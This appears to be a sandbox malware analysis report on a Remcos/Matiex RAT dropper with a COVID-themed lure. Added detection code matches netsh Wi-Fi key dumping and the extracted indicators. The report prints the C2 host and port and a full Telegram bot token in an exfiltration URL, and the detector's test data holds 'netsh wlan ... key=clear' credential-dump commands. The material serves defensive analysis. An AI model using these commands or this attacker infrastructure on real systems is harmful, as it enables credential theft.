Windows Analysis Report UK COVID UPDATES AND ENTITLEMENT.exe

Overview

General Information

Sample Name: UK COVID UPDATES AND ENTITLEMENT.exe
Analysis ID: 481891
MD5: fb465f2b05a6fdc86eb711d7e28e7010
SHA1: 8dd1e185249be7ae7e6ab546bf4c06b59f030d4c
SHA256: 85c6f9cc1d92580088ac090c6eeaba9169aa57290ee6568ef5278fc9170d11dc
Tags: exe, Remcos, RAT

Detection

Remcos, Matiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Capture Wi-Fi password
Antivirus detection for dropped file
Found malware configuration
Yara detected Matiex Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains functionality to capture and log keystrokes
Uses netsh to modify the Windows network and firewall settings
Contains functionality to steal Firefox passwords or cookies
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Yara detected Beds Obfuscator
May check the online IP address of the machine
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal ftp login credentials
Tries to harvest and steal WLAN passwords
Contains functionality to detect virtual machines (IN instruction against the VMware backdoor I/O port)
Contains functionality to steal Chrome passwords or cookies
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file name differs from the original file name recorded in the version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
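Three of the signatures above ("Sigma detected: Capture Wi-Fi password", "Uses netsh to modify the Windows network and firewall settings" and "Tries to harvest and steal WLAN passwords") point at one technique: driving netsh.exe to enumerate saved WLAN profiles and then dump each key with key=clear. The following is an added example of the process-creation detection logic for that technique; it is not code from the report or from Joe Sandbox. The report does not show the sample's actual netsh arguments, so the command lines below are constructed to cover the usual forms (including netsh's keyword abbreviations and spaces around the "="), and the event tuples use a made-up Sysmon-like shape.

```python
"""Process-creation detection for Wi-Fi credential harvesting via netsh.

Added example, not from the report. The command lines in SAMPLE_EVENTS are
constructed; the report does not show the sample's netsh arguments.
"""
import re
from typing import List, Optional, Tuple

NETSH_IMAGE = re.compile(r"(^|[\\/])netsh\.exe$", re.IGNORECASE)


def _abbrev(token: str, keyword: str) -> bool:
    """netsh accepts any unambiguous prefix of a keyword ('sh' for 'show',
    'pr' for 'profiles'), so keywords are matched by prefix, not equality."""
    return keyword.startswith(token)


def classify_netsh(image: str, command_line: str) -> Optional[str]:
    """'high': plaintext WLAN key dump (wlan show/export profile ... key=clear)
    'low' : WLAN profile enumeration without key=clear (reconnaissance)
    None  : not netsh.exe, or netsh used for something else"""
    if not NETSH_IMAGE.search(image):
        return None
    # Lower-case and collapse 'key = clear' so that 'key=clear' is one token.
    tokens = re.sub(r"\s*=\s*", "=", command_line.lower()).split()
    if "wlan" not in tokens:
        return None
    has_verb = any(_abbrev(t, v) for t in tokens for v in ("show", "export"))
    has_profile = any(_abbrev(t, "profiles") for t in tokens)
    if not (has_verb and has_profile):
        return None
    # key=clear is the discriminating token: without it the key is not printed.
    return "high" if "key=clear" in tokens else "low"


# Constructed Sysmon-style process-creation events: (pid, image, command line).
SAMPLE_EVENTS: List[Tuple[int, str, str]] = [
    (1001, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
    (1001, r"C:\Windows\System32\netsh.exe",
     'netsh wlan show profile name="HomeNet" key=clear'),
    (1001, r"C:\Windows\SysWOW64\netsh.exe",
     r"netsh wlan export profile folder=C:\Users\user\AppData\Local\Temp key=clear"),
    # netsh used for something unrelated: no hit.
    (1002, r"C:\Windows\System32\netsh.exe", "netsh advfirewall show allprofiles"),
    # The parent cmd.exe event does not fire; the child netsh.exe event will.
    (1003, r"C:\Windows\System32\cmd.exe", "cmd /c netsh wlan show profile key=clear"),
    # Abbreviated keywords, odd casing and spaces around '=' must still be caught.
    (1004, r"C:\Windows\System32\netsh.exe", "NETSH WLAN sh pr key = clear"),
]


def scan(events: List[Tuple[int, str, str]] = SAMPLE_EVENTS) -> List[Tuple[int, str]]:
    """Return (pid, severity) for every event that matches."""
    hits = []
    for pid, image, cmd in events:
        severity = classify_netsh(image, cmd)
        if severity is not None:
            hits.append((pid, severity))
    return hits
```

Two caveats for anyone deploying this: the image check fails if the attacker copies netsh.exe under another name, so match on the Sysmon OriginalFileName field where it is available; and this only covers the netsh route. A stealer can call WlanGetProfile with the WLAN_PROFILE_GET_PLAINTEXT_KEY flag directly, which produces no process-creation event at all and needs API-level telemetry instead.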

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Avira: detection malicious, Label: TR/Redcap.jajcu
Found malware configuration
Source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "tobi12345.hopto.org:40401:pass|", "Assigned name": "UKLEADS", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "UK.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_aqizussesx", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "UK", "Keylog folder": "remcos"}
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack Malware Configuration Extractor: Matiex {"Exfil Mode": "Telegram", "Telegram Token": "1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM", "Telegram ID": "1120598411"}
Source: dwnl.exe.2896.33.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendMessage"}
Multi AV Scanner detection for submitted file
Source: UK COVID UPDATES AND ENTITLEMENT.exe Virustotal: Detection: 26%
Source: UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: tobi12345.hopto.org Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Machine Learning detection for sample
Source: UK COVID UPDATES AND ENTITLEMENT.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack Avira: Label: TR/Crypt.XPACK.Gen4
Source: 33.2.dwnl.exe.820000.0.unpack Avira: Label: TR/Redcap.jajcu
Source: 33.0.dwnl.exe.820000.0.unpack Avira: Label: TR/Redcap.jajcu
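The three "Found malware configuration" entries in this section are the most actionable part of the report: the Remcos block names the C2 host and port, the mutex, the copy location and the Run-key value, and the Matiex / Telegram RAT blocks expose the bot token that exfiltration goes through. The following is an added example, not code from the report, showing how those extracted fields are turned into host and network indicators and matched against telemetry. The configuration values are copied from the report; the interpretation of the Remcos fields (a "|"-separated host list, "Install flag" gating both the self-copy and the Run value, "Install path" naming an environment root) is an assumption about the Remcos config format, and the event dictionaries use a constructed schema rather than any real product's.

```python
"""Derive indicators from the extracted Remcos and Telegram RAT configs.

Added example, not code from the report. Field semantics are assumptions
about the Remcos config format; the event schema is constructed.
"""
import re
from typing import Dict, List, Tuple

# Copied from the report's Remcos configuration, trimmed to the fields used.
REMCOS_CONFIG: Dict[str, str] = {
    "Host:Port:Password": "tobi12345.hopto.org:40401:pass|",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Disable",
    "Install path": "AppData",
    "Copy folder": "UK",
    "Copy file": "UK.exe",
    "Startup value": "remcos",
    "Mutex": "remcos_aqizussesx",
}
# Copied from the report's Telegram RAT configuration.
TELEGRAM_C2_URL = "https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendMessage"

# Assumption: Remcos "Install path" tokens map to these environment roots.
PATH_ROOTS = {"AppData": "%APPDATA%"}
TELEGRAM_BOT_RE = re.compile(
    r"^https://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+)")


def parse_remcos_hosts(field: str) -> List[Tuple[str, int, str]]:
    """'host:port:password|...|' -> [(host, port, password), ...].
    The trailing '|' in the report's value yields an empty entry; skip it."""
    hosts = []
    for entry in field.split("|"):
        if entry:
            host, port, password = entry.split(":", 2)
            hosts.append((host, int(port), password))
    return hosts


def remcos_iocs(cfg: Dict[str, str]) -> Dict[str, object]:
    """Indicators to hunt for, plus whether persistence artifacts are expected."""
    hives = [h for h in ("HKCU", "HKLM") if cfg.get(f"Setup {h}\\Run") == "Enable"]
    root = PATH_ROOTS.get(cfg["Install path"], cfg["Install path"])
    return {
        "c2": parse_remcos_hosts(cfg["Host:Port:Password"]),
        "mutex": cfg["Mutex"],
        "install_path": f"{root}\\{cfg['Copy folder']}\\{cfg['Copy file']}",
        "run_values": [(h, cfg["Startup value"]) for h in hives],
        # "Install flag": "Disable" means (assumed semantics) the copy and the
        # Run value are configured but never written: treat them as weak IOCs.
        "persistence_expected": cfg["Install flag"] == "Enable",
    }


def telegram_iocs(url: str) -> Dict[str, str]:
    """Split the bot URL into the bot id (stable, shareable) and the secret
    token (hand it to Telegram for revocation rather than re-publishing it)."""
    m = TELEGRAM_BOT_RE.match(url)
    if not m:
        raise ValueError("not a Telegram Bot API URL")
    # Matching on '/bot<id>:' alone catches every API method this bot calls.
    return {"host": "api.telegram.org", "bot_id": m["bot_id"], "token": m["token"],
            "method": m["method"], "path_prefix": f"/bot{m['bot_id']}:"}


def match_event(remcos: Dict[str, object], tele: Dict[str, str], event: Dict[str, object]) -> List[str]:
    """Indicator names one event hits. Constructed schema: type in dns|mutex|registry|http."""
    hits, kind = [], event.get("type")
    if kind == "dns" and any(str(event.get("query", "")).lower() == h.lower() for h, _, _ in remcos["c2"]):
        hits.append("remcos_c2_domain")
    if kind == "mutex" and event.get("name") == remcos["mutex"]:
        hits.append("remcos_mutex")
    if kind == "registry" and any(event.get("hive") == hv and event.get("value") == nm
                                  for hv, nm in remcos["run_values"]):
        hits.append("remcos_run_value" if remcos["persistence_expected"] else "remcos_run_value_weak")
    if kind == "http" and event.get("host") == tele["host"] and str(event.get("path", "")).startswith(tele["path_prefix"]):
        hits.append("telegram_bot_c2")
    return hits


# Constructed events, not taken from the report.
SAMPLE_EVENTS = [
    {"type": "dns", "query": "TOBI12345.hopto.org"},
    {"type": "mutex", "name": "remcos_aqizussesx"},
    {"type": "registry", "hive": "HKCU", "key": r"Software\Microsoft\Windows\CurrentVersion\Run", "value": "remcos"},
    {"type": "http", "host": "api.telegram.org",
     "path": "/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument"},
    {"type": "http", "host": "api.telegram.org", "path": "/bot99999:otherbot/sendMessage"},
]


def scan(events=SAMPLE_EVENTS) -> List[List[str]]:
    remcos, tele = remcos_iocs(REMCOS_CONFIG), telegram_iocs(TELEGRAM_C2_URL)
    return [match_event(remcos, tele, e) for e in events]
```

Two points worth carrying into triage: the Remcos config has "Install flag" set to Disable and "Keylog flag" set to 0, so the Run value, the %APPDATA%\UK\UK.exe copy and logs.dat should not be assumed present on an infected host even though they are configured; and the dynamic-DNS C2 host will resolve to changing addresses, so the domain, not the IP, is the indicator to block.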

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.5:49783 version: TLS 1.0
Uses 32bit PE files
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cldapi.pdb_6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb^? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdbb?r source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbd?x source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb(/ source: WerFault.exe, 00000022.00000003.442299112.0000000005532000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdbR?" source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb&?> source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: psapi.pdbL? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb=6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbJ? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb;6I source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, dwnl.exe.28.dr
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbc6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbx?t source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdbv? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdbo6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdbSHA256/ source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, dwnl.exe.28.dr
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbn?f source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb(?$ source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb@? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbT?( source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
